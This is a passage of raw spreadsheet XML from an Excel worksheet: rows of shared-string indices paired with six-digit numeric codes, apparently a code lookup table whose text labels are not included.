      <c r="A18023" s="28" t="s">
        <v>20738</v>
      </c>
      <c r="B18023" s="14" t="s">
        <v>9815</v>
      </c>
      <c r="C18023" s="15">
        <v>502200</v>
      </c>
    </row>
    <row r="18024" spans="1:3">
      <c r="A18024" s="28" t="s">
        <v>20738</v>
      </c>
      <c r="B18024" s="14" t="s">
        <v>9815</v>
      </c>
      <c r="C18024" s="15">
        <v>502201</v>
      </c>
    </row>
    <row r="18025" spans="1:3">
      <c r="A18025" s="28" t="s">
        <v>20738</v>
      </c>
      <c r="B18025" s="14" t="s">
        <v>9815</v>
      </c>
      <c r="C18025" s="15">
        <v>502203</v>
      </c>
    </row>
    <row r="18026" spans="1:3">
      <c r="A18026" s="28" t="s">
        <v>20738</v>
      </c>
      <c r="B18026" s="14" t="s">
        <v>9815</v>
      </c>
      <c r="C18026" s="15">
        <v>502211</v>
      </c>
    </row>
    <row r="18027" spans="1:3">
      <c r="A18027" s="28" t="s">
        <v>25583</v>
      </c>
      <c r="B18027" s="14" t="s">
        <v>15794</v>
      </c>
      <c r="C18027" s="15">
        <v>503000</v>
      </c>
    </row>
    <row r="18028" spans="1:3">
      <c r="A18028" s="28" t="s">
        <v>25584</v>
      </c>
      <c r="B18028" s="14" t="s">
        <v>15795</v>
      </c>
      <c r="C18028" s="15">
        <v>503002</v>
      </c>
    </row>
    <row r="18029" spans="1:3">
      <c r="A18029" s="28" t="s">
        <v>25585</v>
      </c>
      <c r="B18029" s="14" t="s">
        <v>15796</v>
      </c>
      <c r="C18029" s="15">
        <v>503003</v>
      </c>
    </row>
    <row r="18030" spans="1:3">
      <c r="A18030" s="28" t="s">
        <v>401</v>
      </c>
      <c r="B18030" s="14" t="s">
        <v>9632</v>
      </c>
      <c r="C18030" s="15">
        <v>503004</v>
      </c>
    </row>
    <row r="18031" spans="1:3">
      <c r="A18031" s="28" t="s">
        <v>20047</v>
      </c>
      <c r="B18031" s="14" t="s">
        <v>9045</v>
      </c>
      <c r="C18031" s="15">
        <v>503005</v>
      </c>
    </row>
    <row r="18032" spans="1:3">
      <c r="A18032" s="28" t="s">
        <v>25586</v>
      </c>
      <c r="B18032" s="14" t="s">
        <v>15797</v>
      </c>
      <c r="C18032" s="15">
        <v>503009</v>
      </c>
    </row>
    <row r="18033" spans="1:3">
      <c r="A18033" s="28" t="s">
        <v>25587</v>
      </c>
      <c r="B18033" s="14" t="s">
        <v>15798</v>
      </c>
      <c r="C18033" s="15">
        <v>503016</v>
      </c>
    </row>
    <row r="18034" spans="1:3">
      <c r="A18034" s="28" t="s">
        <v>25588</v>
      </c>
      <c r="B18034" s="14" t="s">
        <v>15799</v>
      </c>
      <c r="C18034" s="15">
        <v>503018</v>
      </c>
    </row>
    <row r="18035" spans="1:3">
      <c r="A18035" s="28" t="s">
        <v>25589</v>
      </c>
      <c r="B18035" s="14" t="s">
        <v>15800</v>
      </c>
      <c r="C18035" s="15">
        <v>503019</v>
      </c>
    </row>
    <row r="18036" spans="1:3">
      <c r="A18036" s="28" t="s">
        <v>25590</v>
      </c>
      <c r="B18036" s="14" t="s">
        <v>15801</v>
      </c>
      <c r="C18036" s="15">
        <v>503029</v>
      </c>
    </row>
    <row r="18037" spans="1:3">
      <c r="A18037" s="28" t="s">
        <v>25591</v>
      </c>
      <c r="B18037" s="14" t="s">
        <v>15802</v>
      </c>
      <c r="C18037" s="15">
        <v>503031</v>
      </c>
    </row>
    <row r="18038" spans="1:3">
      <c r="A18038" s="28" t="s">
        <v>25592</v>
      </c>
      <c r="B18038" s="14" t="s">
        <v>15803</v>
      </c>
      <c r="C18038" s="15">
        <v>503033</v>
      </c>
    </row>
    <row r="18039" spans="1:3">
      <c r="A18039" s="28" t="s">
        <v>22045</v>
      </c>
      <c r="B18039" s="14" t="s">
        <v>8336</v>
      </c>
      <c r="C18039" s="15">
        <v>503050</v>
      </c>
    </row>
    <row r="18040" spans="1:3">
      <c r="A18040" s="28" t="s">
        <v>1049</v>
      </c>
      <c r="B18040" s="14" t="s">
        <v>8334</v>
      </c>
      <c r="C18040" s="15">
        <v>503051</v>
      </c>
    </row>
    <row r="18041" spans="1:3">
      <c r="A18041" s="28" t="s">
        <v>25593</v>
      </c>
      <c r="B18041" s="14" t="s">
        <v>15804</v>
      </c>
      <c r="C18041" s="15">
        <v>503057</v>
      </c>
    </row>
    <row r="18042" spans="1:3">
      <c r="A18042" s="28" t="s">
        <v>25594</v>
      </c>
      <c r="B18042" s="14" t="s">
        <v>15805</v>
      </c>
      <c r="C18042" s="15">
        <v>503058</v>
      </c>
    </row>
    <row r="18043" spans="1:3">
      <c r="A18043" s="28" t="s">
        <v>25595</v>
      </c>
      <c r="B18043" s="14" t="s">
        <v>15806</v>
      </c>
      <c r="C18043" s="15">
        <v>503059</v>
      </c>
    </row>
    <row r="18044" spans="1:3">
      <c r="A18044" s="28" t="s">
        <v>21108</v>
      </c>
      <c r="B18044" s="14" t="s">
        <v>10208</v>
      </c>
      <c r="C18044" s="15">
        <v>503082</v>
      </c>
    </row>
    <row r="18045" spans="1:3">
      <c r="A18045" s="28" t="s">
        <v>25596</v>
      </c>
      <c r="B18045" s="14" t="s">
        <v>15807</v>
      </c>
      <c r="C18045" s="15">
        <v>503400</v>
      </c>
    </row>
    <row r="18046" spans="1:3">
      <c r="A18046" s="28" t="s">
        <v>25597</v>
      </c>
      <c r="B18046" s="14" t="s">
        <v>15808</v>
      </c>
      <c r="C18046" s="15">
        <v>503402</v>
      </c>
    </row>
    <row r="18047" spans="1:3">
      <c r="A18047" s="28" t="s">
        <v>25598</v>
      </c>
      <c r="B18047" s="14" t="s">
        <v>15809</v>
      </c>
      <c r="C18047" s="15">
        <v>503405</v>
      </c>
    </row>
    <row r="18048" spans="1:3">
      <c r="A18048" s="28" t="s">
        <v>450</v>
      </c>
      <c r="B18048" s="14" t="s">
        <v>15810</v>
      </c>
      <c r="C18048" s="15">
        <v>503409</v>
      </c>
    </row>
    <row r="18049" spans="1:3">
      <c r="A18049" s="28" t="s">
        <v>25599</v>
      </c>
      <c r="B18049" s="14" t="s">
        <v>15811</v>
      </c>
      <c r="C18049" s="15">
        <v>503410</v>
      </c>
    </row>
    <row r="18050" spans="1:3">
      <c r="A18050" s="28" t="s">
        <v>21256</v>
      </c>
      <c r="B18050" s="14" t="s">
        <v>10370</v>
      </c>
      <c r="C18050" s="15">
        <v>503420</v>
      </c>
    </row>
    <row r="18051" spans="1:3">
      <c r="A18051" s="28" t="s">
        <v>25600</v>
      </c>
      <c r="B18051" s="14" t="s">
        <v>15812</v>
      </c>
      <c r="C18051" s="15">
        <v>503430</v>
      </c>
    </row>
    <row r="18052" spans="1:3">
      <c r="A18052" s="28" t="s">
        <v>7160</v>
      </c>
      <c r="B18052" s="14" t="s">
        <v>15813</v>
      </c>
      <c r="C18052" s="15">
        <v>503440</v>
      </c>
    </row>
    <row r="18053" spans="1:3">
      <c r="A18053" s="28" t="s">
        <v>25601</v>
      </c>
      <c r="B18053" s="14" t="s">
        <v>15814</v>
      </c>
      <c r="C18053" s="15">
        <v>505000</v>
      </c>
    </row>
    <row r="18054" spans="1:3">
      <c r="A18054" s="28" t="s">
        <v>7145</v>
      </c>
      <c r="B18054" s="14" t="s">
        <v>15815</v>
      </c>
      <c r="C18054" s="15">
        <v>505043</v>
      </c>
    </row>
    <row r="18055" spans="1:3">
      <c r="A18055" s="28" t="s">
        <v>25602</v>
      </c>
      <c r="B18055" s="14" t="s">
        <v>15816</v>
      </c>
      <c r="C18055" s="15">
        <v>505060</v>
      </c>
    </row>
    <row r="18056" spans="1:3">
      <c r="A18056" s="28" t="s">
        <v>25603</v>
      </c>
      <c r="B18056" s="14" t="s">
        <v>15817</v>
      </c>
      <c r="C18056" s="15">
        <v>505070</v>
      </c>
    </row>
    <row r="18057" spans="1:3">
      <c r="A18057" s="28" t="s">
        <v>25604</v>
      </c>
      <c r="B18057" s="14" t="s">
        <v>9669</v>
      </c>
      <c r="C18057" s="15">
        <v>505100</v>
      </c>
    </row>
    <row r="18058" spans="1:3">
      <c r="A18058" s="28" t="s">
        <v>25605</v>
      </c>
      <c r="B18058" s="14" t="s">
        <v>15818</v>
      </c>
      <c r="C18058" s="15">
        <v>505105</v>
      </c>
    </row>
    <row r="18059" spans="1:3">
      <c r="A18059" s="28" t="s">
        <v>25606</v>
      </c>
      <c r="B18059" s="14" t="s">
        <v>15819</v>
      </c>
      <c r="C18059" s="15">
        <v>505121</v>
      </c>
    </row>
    <row r="18060" spans="1:3">
      <c r="A18060" s="28" t="s">
        <v>25607</v>
      </c>
      <c r="B18060" s="14" t="s">
        <v>15820</v>
      </c>
      <c r="C18060" s="15">
        <v>505122</v>
      </c>
    </row>
    <row r="18061" spans="1:3">
      <c r="A18061" s="28" t="s">
        <v>25608</v>
      </c>
      <c r="B18061" s="14" t="s">
        <v>15821</v>
      </c>
      <c r="C18061" s="15">
        <v>505123</v>
      </c>
    </row>
    <row r="18062" spans="1:3">
      <c r="A18062" s="28" t="s">
        <v>25609</v>
      </c>
      <c r="B18062" s="14" t="s">
        <v>15822</v>
      </c>
      <c r="C18062" s="15">
        <v>505124</v>
      </c>
    </row>
    <row r="18063" spans="1:3">
      <c r="A18063" s="28" t="s">
        <v>1200</v>
      </c>
      <c r="B18063" s="14" t="s">
        <v>8938</v>
      </c>
      <c r="C18063" s="15">
        <v>505125</v>
      </c>
    </row>
    <row r="18064" spans="1:3">
      <c r="A18064" s="28" t="s">
        <v>25610</v>
      </c>
      <c r="B18064" s="14" t="s">
        <v>15823</v>
      </c>
      <c r="C18064" s="15">
        <v>505129</v>
      </c>
    </row>
    <row r="18065" spans="1:3">
      <c r="A18065" s="28" t="s">
        <v>25606</v>
      </c>
      <c r="B18065" s="14" t="s">
        <v>15819</v>
      </c>
      <c r="C18065" s="15">
        <v>505131</v>
      </c>
    </row>
    <row r="18066" spans="1:3">
      <c r="A18066" s="28" t="s">
        <v>25607</v>
      </c>
      <c r="B18066" s="14" t="s">
        <v>15820</v>
      </c>
      <c r="C18066" s="15">
        <v>505132</v>
      </c>
    </row>
    <row r="18067" spans="1:3">
      <c r="A18067" s="28" t="s">
        <v>25611</v>
      </c>
      <c r="B18067" s="14" t="s">
        <v>15824</v>
      </c>
      <c r="C18067" s="15">
        <v>505134</v>
      </c>
    </row>
    <row r="18068" spans="1:3">
      <c r="A18068" s="28" t="s">
        <v>25612</v>
      </c>
      <c r="B18068" s="14" t="s">
        <v>15825</v>
      </c>
      <c r="C18068" s="15">
        <v>505150</v>
      </c>
    </row>
    <row r="18069" spans="1:3">
      <c r="A18069" s="28" t="s">
        <v>25612</v>
      </c>
      <c r="B18069" s="14" t="s">
        <v>15825</v>
      </c>
      <c r="C18069" s="15">
        <v>505151</v>
      </c>
    </row>
    <row r="18070" spans="1:3">
      <c r="A18070" s="28" t="s">
        <v>22098</v>
      </c>
      <c r="B18070" s="14" t="s">
        <v>9370</v>
      </c>
      <c r="C18070" s="15">
        <v>505157</v>
      </c>
    </row>
    <row r="18071" spans="1:3">
      <c r="A18071" s="28" t="s">
        <v>25613</v>
      </c>
      <c r="B18071" s="14" t="s">
        <v>15826</v>
      </c>
      <c r="C18071" s="15">
        <v>505158</v>
      </c>
    </row>
    <row r="18072" spans="1:3">
      <c r="A18072" s="28" t="s">
        <v>25610</v>
      </c>
      <c r="B18072" s="14" t="s">
        <v>8902</v>
      </c>
      <c r="C18072" s="15">
        <v>505159</v>
      </c>
    </row>
    <row r="18073" spans="1:3">
      <c r="A18073" s="28" t="s">
        <v>25614</v>
      </c>
      <c r="B18073" s="14" t="s">
        <v>15827</v>
      </c>
      <c r="C18073" s="15">
        <v>505160</v>
      </c>
    </row>
    <row r="18074" spans="1:3">
      <c r="A18074" s="28" t="s">
        <v>25607</v>
      </c>
      <c r="B18074" s="14" t="s">
        <v>15820</v>
      </c>
      <c r="C18074" s="15">
        <v>505162</v>
      </c>
    </row>
    <row r="18075" spans="1:3">
      <c r="A18075" s="28" t="s">
        <v>25615</v>
      </c>
      <c r="B18075" s="14" t="s">
        <v>15828</v>
      </c>
      <c r="C18075" s="15">
        <v>505170</v>
      </c>
    </row>
    <row r="18076" spans="1:3">
      <c r="A18076" s="28" t="s">
        <v>25616</v>
      </c>
      <c r="B18076" s="14" t="s">
        <v>15829</v>
      </c>
      <c r="C18076" s="15">
        <v>505173</v>
      </c>
    </row>
    <row r="18077" spans="1:3">
      <c r="A18077" s="28" t="s">
        <v>783</v>
      </c>
      <c r="B18077" s="14" t="s">
        <v>11195</v>
      </c>
      <c r="C18077" s="15">
        <v>505180</v>
      </c>
    </row>
    <row r="18078" spans="1:3">
      <c r="A18078" s="28" t="s">
        <v>25617</v>
      </c>
      <c r="B18078" s="14" t="s">
        <v>15830</v>
      </c>
      <c r="C18078" s="15">
        <v>505181</v>
      </c>
    </row>
    <row r="18079" spans="1:3">
      <c r="A18079" s="28" t="s">
        <v>19934</v>
      </c>
      <c r="B18079" s="14" t="s">
        <v>8913</v>
      </c>
      <c r="C18079" s="15">
        <v>505182</v>
      </c>
    </row>
    <row r="18080" spans="1:3">
      <c r="A18080" s="28" t="s">
        <v>25618</v>
      </c>
      <c r="B18080" s="14" t="s">
        <v>15831</v>
      </c>
      <c r="C18080" s="15">
        <v>505183</v>
      </c>
    </row>
    <row r="18081" spans="1:31">
      <c r="A18081" s="28" t="s">
        <v>25619</v>
      </c>
      <c r="B18081" s="14" t="s">
        <v>15832</v>
      </c>
      <c r="C18081" s="15">
        <v>505184</v>
      </c>
    </row>
    <row r="18082" spans="1:31">
      <c r="A18082" s="28" t="s">
        <v>20168</v>
      </c>
      <c r="B18082" s="14" t="s">
        <v>9191</v>
      </c>
      <c r="C18082" s="15">
        <v>505186</v>
      </c>
    </row>
    <row r="18083" spans="1:31">
      <c r="A18083" s="28" t="s">
        <v>25610</v>
      </c>
      <c r="B18083" s="14" t="s">
        <v>15823</v>
      </c>
      <c r="C18083" s="15">
        <v>505188</v>
      </c>
    </row>
    <row r="18084" spans="1:31">
      <c r="A18084" s="28" t="s">
        <v>25620</v>
      </c>
      <c r="B18084" s="14" t="s">
        <v>15832</v>
      </c>
      <c r="C18084" s="15">
        <v>505189</v>
      </c>
    </row>
    <row r="18085" spans="1:31">
      <c r="A18085" s="28" t="s">
        <v>25621</v>
      </c>
      <c r="B18085" s="14" t="s">
        <v>15833</v>
      </c>
      <c r="C18085" s="15">
        <v>505191</v>
      </c>
    </row>
    <row r="18086" spans="1:31">
      <c r="A18086" s="28" t="s">
        <v>25622</v>
      </c>
      <c r="B18086" s="14" t="s">
        <v>15834</v>
      </c>
      <c r="C18086" s="15">
        <v>505195</v>
      </c>
    </row>
    <row r="18087" spans="1:31">
      <c r="A18087" s="28" t="s">
        <v>25623</v>
      </c>
      <c r="B18087" s="14" t="s">
        <v>8340</v>
      </c>
      <c r="C18087" s="15">
        <v>505196</v>
      </c>
    </row>
    <row r="18088" spans="1:31" s="20" customFormat="1">
      <c r="A18088" s="28" t="s">
        <v>7153</v>
      </c>
      <c r="B18088" s="17" t="s">
        <v>15835</v>
      </c>
      <c r="C18088" s="15">
        <v>505400</v>
      </c>
      <c r="D18088" s="19"/>
      <c r="E18088" s="19"/>
      <c r="F18088" s="19"/>
      <c r="G18088" s="19"/>
      <c r="H18088" s="19"/>
      <c r="I18088" s="19"/>
      <c r="J18088" s="19"/>
      <c r="K18088" s="19"/>
      <c r="L18088" s="19"/>
      <c r="M18088" s="19"/>
      <c r="N18088" s="19"/>
      <c r="O18088" s="19"/>
      <c r="P18088" s="19"/>
      <c r="Q18088" s="19"/>
      <c r="R18088" s="19"/>
      <c r="S18088" s="19"/>
      <c r="T18088" s="19"/>
      <c r="U18088" s="19"/>
      <c r="V18088" s="19"/>
      <c r="W18088" s="19"/>
      <c r="X18088" s="19"/>
      <c r="Y18088" s="19"/>
      <c r="Z18088" s="19"/>
      <c r="AA18088" s="19"/>
      <c r="AB18088" s="19"/>
      <c r="AC18088" s="19"/>
      <c r="AD18088" s="19"/>
      <c r="AE18088" s="19"/>
    </row>
    <row r="18089" spans="1:31">
      <c r="A18089" s="28" t="s">
        <v>20179</v>
      </c>
      <c r="B18089" s="14" t="s">
        <v>15836</v>
      </c>
      <c r="C18089" s="15">
        <v>505402</v>
      </c>
    </row>
    <row r="18090" spans="1:31">
      <c r="A18090" s="28" t="s">
        <v>25624</v>
      </c>
      <c r="B18090" s="14" t="s">
        <v>15836</v>
      </c>
      <c r="C18090" s="15">
        <v>505450</v>
      </c>
    </row>
    <row r="18091" spans="1:31">
      <c r="A18091" s="28" t="s">
        <v>25625</v>
      </c>
      <c r="B18091" s="14" t="s">
        <v>15837</v>
      </c>
      <c r="C18091" s="15">
        <v>505454</v>
      </c>
    </row>
    <row r="18092" spans="1:31">
      <c r="A18092" s="28" t="s">
        <v>25626</v>
      </c>
      <c r="B18092" s="14" t="s">
        <v>15838</v>
      </c>
      <c r="C18092" s="15">
        <v>505458</v>
      </c>
    </row>
    <row r="18093" spans="1:31">
      <c r="A18093" s="28" t="s">
        <v>25627</v>
      </c>
      <c r="B18093" s="14" t="s">
        <v>15839</v>
      </c>
      <c r="C18093" s="15">
        <v>505460</v>
      </c>
    </row>
    <row r="18094" spans="1:31">
      <c r="A18094" s="28" t="s">
        <v>25628</v>
      </c>
      <c r="B18094" s="14" t="s">
        <v>15840</v>
      </c>
      <c r="C18094" s="15">
        <v>505470</v>
      </c>
    </row>
    <row r="18095" spans="1:31">
      <c r="A18095" s="28" t="s">
        <v>25629</v>
      </c>
      <c r="B18095" s="14" t="s">
        <v>15841</v>
      </c>
      <c r="C18095" s="15">
        <v>505471</v>
      </c>
    </row>
    <row r="18096" spans="1:31">
      <c r="A18096" s="28" t="s">
        <v>25630</v>
      </c>
      <c r="B18096" s="14" t="s">
        <v>11421</v>
      </c>
      <c r="C18096" s="15">
        <v>505474</v>
      </c>
    </row>
    <row r="18097" spans="1:3">
      <c r="A18097" s="28" t="s">
        <v>25631</v>
      </c>
      <c r="B18097" s="14" t="s">
        <v>15842</v>
      </c>
      <c r="C18097" s="15">
        <v>505480</v>
      </c>
    </row>
    <row r="18098" spans="1:3">
      <c r="A18098" s="28" t="s">
        <v>25632</v>
      </c>
      <c r="B18098" s="14" t="s">
        <v>15843</v>
      </c>
      <c r="C18098" s="15">
        <v>505490</v>
      </c>
    </row>
    <row r="18099" spans="1:3">
      <c r="A18099" s="28" t="s">
        <v>25633</v>
      </c>
      <c r="B18099" s="14" t="s">
        <v>15844</v>
      </c>
      <c r="C18099" s="15">
        <v>505491</v>
      </c>
    </row>
    <row r="18100" spans="1:3">
      <c r="A18100" s="28" t="s">
        <v>25634</v>
      </c>
      <c r="B18100" s="14" t="s">
        <v>15845</v>
      </c>
      <c r="C18100" s="15">
        <v>505492</v>
      </c>
    </row>
    <row r="18101" spans="1:3">
      <c r="A18101" s="28" t="s">
        <v>25635</v>
      </c>
      <c r="B18101" s="14" t="s">
        <v>15846</v>
      </c>
      <c r="C18101" s="15">
        <v>505493</v>
      </c>
    </row>
    <row r="18102" spans="1:3">
      <c r="A18102" s="28" t="s">
        <v>25636</v>
      </c>
      <c r="B18102" s="14" t="s">
        <v>15847</v>
      </c>
      <c r="C18102" s="15">
        <v>505494</v>
      </c>
    </row>
    <row r="18103" spans="1:3">
      <c r="A18103" s="28" t="s">
        <v>25637</v>
      </c>
      <c r="B18103" s="14" t="s">
        <v>15840</v>
      </c>
      <c r="C18103" s="15">
        <v>505498</v>
      </c>
    </row>
    <row r="18104" spans="1:3">
      <c r="A18104" s="28" t="s">
        <v>25638</v>
      </c>
      <c r="B18104" s="14" t="s">
        <v>15848</v>
      </c>
      <c r="C18104" s="15">
        <v>505499</v>
      </c>
    </row>
    <row r="18105" spans="1:3">
      <c r="A18105" s="28" t="s">
        <v>7116</v>
      </c>
      <c r="B18105" s="14" t="s">
        <v>15849</v>
      </c>
      <c r="C18105" s="15">
        <v>505600</v>
      </c>
    </row>
    <row r="18106" spans="1:3">
      <c r="A18106" s="28" t="s">
        <v>25639</v>
      </c>
      <c r="B18106" s="14" t="s">
        <v>15850</v>
      </c>
      <c r="C18106" s="15">
        <v>505601</v>
      </c>
    </row>
    <row r="18107" spans="1:3">
      <c r="A18107" s="28" t="s">
        <v>25640</v>
      </c>
      <c r="B18107" s="14" t="s">
        <v>15849</v>
      </c>
      <c r="C18107" s="15">
        <v>505603</v>
      </c>
    </row>
    <row r="18108" spans="1:3">
      <c r="A18108" s="28" t="s">
        <v>25641</v>
      </c>
      <c r="B18108" s="14" t="s">
        <v>15849</v>
      </c>
      <c r="C18108" s="15">
        <v>505604</v>
      </c>
    </row>
    <row r="18109" spans="1:3">
      <c r="A18109" s="28" t="s">
        <v>25642</v>
      </c>
      <c r="B18109" s="14" t="s">
        <v>15851</v>
      </c>
      <c r="C18109" s="15">
        <v>505605</v>
      </c>
    </row>
    <row r="18110" spans="1:3">
      <c r="A18110" s="28" t="s">
        <v>25643</v>
      </c>
      <c r="B18110" s="14" t="s">
        <v>11283</v>
      </c>
      <c r="C18110" s="15">
        <v>505606</v>
      </c>
    </row>
    <row r="18111" spans="1:3">
      <c r="A18111" s="28" t="s">
        <v>25644</v>
      </c>
      <c r="B18111" s="14" t="s">
        <v>15852</v>
      </c>
      <c r="C18111" s="15">
        <v>505607</v>
      </c>
    </row>
    <row r="18112" spans="1:3">
      <c r="A18112" s="28" t="s">
        <v>25645</v>
      </c>
      <c r="B18112" s="14" t="s">
        <v>15853</v>
      </c>
      <c r="C18112" s="15">
        <v>505608</v>
      </c>
    </row>
    <row r="18113" spans="1:3">
      <c r="A18113" s="28" t="s">
        <v>25646</v>
      </c>
      <c r="B18113" s="14" t="s">
        <v>15854</v>
      </c>
      <c r="C18113" s="15">
        <v>505609</v>
      </c>
    </row>
    <row r="18114" spans="1:3">
      <c r="A18114" s="28" t="s">
        <v>25647</v>
      </c>
      <c r="B18114" s="14" t="s">
        <v>15855</v>
      </c>
      <c r="C18114" s="15">
        <v>505610</v>
      </c>
    </row>
    <row r="18115" spans="1:3">
      <c r="A18115" s="28" t="s">
        <v>25648</v>
      </c>
      <c r="B18115" s="14" t="s">
        <v>15856</v>
      </c>
      <c r="C18115" s="15">
        <v>505611</v>
      </c>
    </row>
    <row r="18116" spans="1:3">
      <c r="A18116" s="28" t="s">
        <v>25649</v>
      </c>
      <c r="B18116" s="14" t="s">
        <v>15857</v>
      </c>
      <c r="C18116" s="15">
        <v>505612</v>
      </c>
    </row>
    <row r="18117" spans="1:3">
      <c r="A18117" s="28" t="s">
        <v>25650</v>
      </c>
      <c r="B18117" s="14" t="s">
        <v>15858</v>
      </c>
      <c r="C18117" s="15">
        <v>505614</v>
      </c>
    </row>
    <row r="18118" spans="1:3">
      <c r="A18118" s="28" t="s">
        <v>25651</v>
      </c>
      <c r="B18118" s="14" t="s">
        <v>28182</v>
      </c>
      <c r="C18118" s="15">
        <v>505615</v>
      </c>
    </row>
    <row r="18119" spans="1:3">
      <c r="A18119" s="28" t="s">
        <v>22158</v>
      </c>
      <c r="B18119" s="17" t="s">
        <v>15859</v>
      </c>
      <c r="C18119" s="15">
        <v>505616</v>
      </c>
    </row>
    <row r="18120" spans="1:3">
      <c r="A18120" s="28" t="s">
        <v>25652</v>
      </c>
      <c r="B18120" s="14" t="s">
        <v>15860</v>
      </c>
      <c r="C18120" s="15">
        <v>505617</v>
      </c>
    </row>
    <row r="18121" spans="1:3">
      <c r="A18121" s="28" t="s">
        <v>25653</v>
      </c>
      <c r="B18121" s="14" t="s">
        <v>15861</v>
      </c>
      <c r="C18121" s="15">
        <v>505618</v>
      </c>
    </row>
    <row r="18122" spans="1:3">
      <c r="A18122" s="28" t="s">
        <v>25652</v>
      </c>
      <c r="B18122" s="14" t="s">
        <v>15862</v>
      </c>
      <c r="C18122" s="15">
        <v>505619</v>
      </c>
    </row>
    <row r="18123" spans="1:3">
      <c r="A18123" s="28" t="s">
        <v>25654</v>
      </c>
      <c r="B18123" s="14" t="s">
        <v>15863</v>
      </c>
      <c r="C18123" s="15">
        <v>505640</v>
      </c>
    </row>
    <row r="18124" spans="1:3">
      <c r="A18124" s="28" t="s">
        <v>25655</v>
      </c>
      <c r="B18124" s="14" t="s">
        <v>15863</v>
      </c>
      <c r="C18124" s="15">
        <v>505642</v>
      </c>
    </row>
    <row r="18125" spans="1:3">
      <c r="A18125" s="28" t="s">
        <v>25656</v>
      </c>
      <c r="B18125" s="14" t="s">
        <v>15864</v>
      </c>
      <c r="C18125" s="15">
        <v>505646</v>
      </c>
    </row>
    <row r="18126" spans="1:3">
      <c r="A18126" s="28" t="s">
        <v>25657</v>
      </c>
      <c r="B18126" s="14" t="s">
        <v>15865</v>
      </c>
      <c r="C18126" s="15">
        <v>505648</v>
      </c>
    </row>
    <row r="18127" spans="1:3">
      <c r="A18127" s="28" t="s">
        <v>25658</v>
      </c>
      <c r="B18127" s="14" t="s">
        <v>15866</v>
      </c>
      <c r="C18127" s="15">
        <v>505649</v>
      </c>
    </row>
    <row r="18128" spans="1:3">
      <c r="A18128" s="28" t="s">
        <v>152</v>
      </c>
      <c r="B18128" s="14" t="s">
        <v>9045</v>
      </c>
      <c r="C18128" s="15">
        <v>506000</v>
      </c>
    </row>
    <row r="18129" spans="1:3">
      <c r="A18129" s="28" t="s">
        <v>25659</v>
      </c>
      <c r="B18129" s="14" t="s">
        <v>15867</v>
      </c>
      <c r="C18129" s="15">
        <v>506001</v>
      </c>
    </row>
    <row r="18130" spans="1:3">
      <c r="A18130" s="28" t="s">
        <v>25660</v>
      </c>
      <c r="B18130" s="14" t="s">
        <v>15868</v>
      </c>
      <c r="C18130" s="15">
        <v>506002</v>
      </c>
    </row>
    <row r="18131" spans="1:3">
      <c r="A18131" s="28" t="s">
        <v>25661</v>
      </c>
      <c r="B18131" s="14" t="s">
        <v>15869</v>
      </c>
      <c r="C18131" s="15">
        <v>506003</v>
      </c>
    </row>
    <row r="18132" spans="1:3">
      <c r="A18132" s="28" t="s">
        <v>25662</v>
      </c>
      <c r="B18132" s="14" t="s">
        <v>15870</v>
      </c>
      <c r="C18132" s="15">
        <v>506005</v>
      </c>
    </row>
    <row r="18133" spans="1:3">
      <c r="A18133" s="28" t="s">
        <v>25662</v>
      </c>
      <c r="B18133" s="14" t="s">
        <v>9045</v>
      </c>
      <c r="C18133" s="15">
        <v>506006</v>
      </c>
    </row>
    <row r="18134" spans="1:3">
      <c r="A18134" s="28" t="s">
        <v>25663</v>
      </c>
      <c r="B18134" s="14" t="s">
        <v>15871</v>
      </c>
      <c r="C18134" s="15">
        <v>506007</v>
      </c>
    </row>
    <row r="18135" spans="1:3">
      <c r="A18135" s="28" t="s">
        <v>25664</v>
      </c>
      <c r="B18135" s="14" t="s">
        <v>15872</v>
      </c>
      <c r="C18135" s="15">
        <v>506008</v>
      </c>
    </row>
    <row r="18136" spans="1:3">
      <c r="A18136" s="28" t="s">
        <v>25665</v>
      </c>
      <c r="B18136" s="14" t="s">
        <v>15873</v>
      </c>
      <c r="C18136" s="15">
        <v>506009</v>
      </c>
    </row>
    <row r="18137" spans="1:3">
      <c r="A18137" s="28" t="s">
        <v>25662</v>
      </c>
      <c r="B18137" s="14" t="s">
        <v>9045</v>
      </c>
      <c r="C18137" s="15">
        <v>506010</v>
      </c>
    </row>
    <row r="18138" spans="1:3">
      <c r="A18138" s="28" t="s">
        <v>25666</v>
      </c>
      <c r="B18138" s="14" t="s">
        <v>15874</v>
      </c>
      <c r="C18138" s="15">
        <v>506020</v>
      </c>
    </row>
    <row r="18139" spans="1:3">
      <c r="A18139" s="28" t="s">
        <v>25667</v>
      </c>
      <c r="B18139" s="14" t="s">
        <v>15875</v>
      </c>
      <c r="C18139" s="15">
        <v>506022</v>
      </c>
    </row>
    <row r="18140" spans="1:3">
      <c r="A18140" s="28" t="s">
        <v>25668</v>
      </c>
      <c r="B18140" s="14" t="s">
        <v>15876</v>
      </c>
      <c r="C18140" s="15">
        <v>506025</v>
      </c>
    </row>
    <row r="18141" spans="1:3">
      <c r="A18141" s="28" t="s">
        <v>7168</v>
      </c>
      <c r="B18141" s="14" t="s">
        <v>15877</v>
      </c>
      <c r="C18141" s="15">
        <v>506200</v>
      </c>
    </row>
    <row r="18142" spans="1:3">
      <c r="A18142" s="28" t="s">
        <v>25669</v>
      </c>
      <c r="B18142" s="14" t="s">
        <v>15878</v>
      </c>
      <c r="C18142" s="15">
        <v>506201</v>
      </c>
    </row>
    <row r="18143" spans="1:3">
      <c r="A18143" s="28" t="s">
        <v>25670</v>
      </c>
      <c r="B18143" s="14" t="s">
        <v>15879</v>
      </c>
      <c r="C18143" s="15">
        <v>506202</v>
      </c>
    </row>
    <row r="18144" spans="1:3">
      <c r="A18144" s="28" t="s">
        <v>25671</v>
      </c>
      <c r="B18144" s="14" t="s">
        <v>15880</v>
      </c>
      <c r="C18144" s="15">
        <v>506203</v>
      </c>
    </row>
    <row r="18145" spans="1:3">
      <c r="A18145" s="28" t="s">
        <v>22159</v>
      </c>
      <c r="B18145" s="14" t="s">
        <v>11282</v>
      </c>
      <c r="C18145" s="15">
        <v>506204</v>
      </c>
    </row>
    <row r="18146" spans="1:3">
      <c r="A18146" s="28" t="s">
        <v>4338</v>
      </c>
      <c r="B18146" s="14" t="s">
        <v>9169</v>
      </c>
      <c r="C18146" s="15">
        <v>506205</v>
      </c>
    </row>
    <row r="18147" spans="1:3">
      <c r="A18147" s="28" t="s">
        <v>25672</v>
      </c>
      <c r="B18147" s="14" t="s">
        <v>15881</v>
      </c>
      <c r="C18147" s="15">
        <v>506206</v>
      </c>
    </row>
    <row r="18148" spans="1:3">
      <c r="A18148" s="28" t="s">
        <v>19855</v>
      </c>
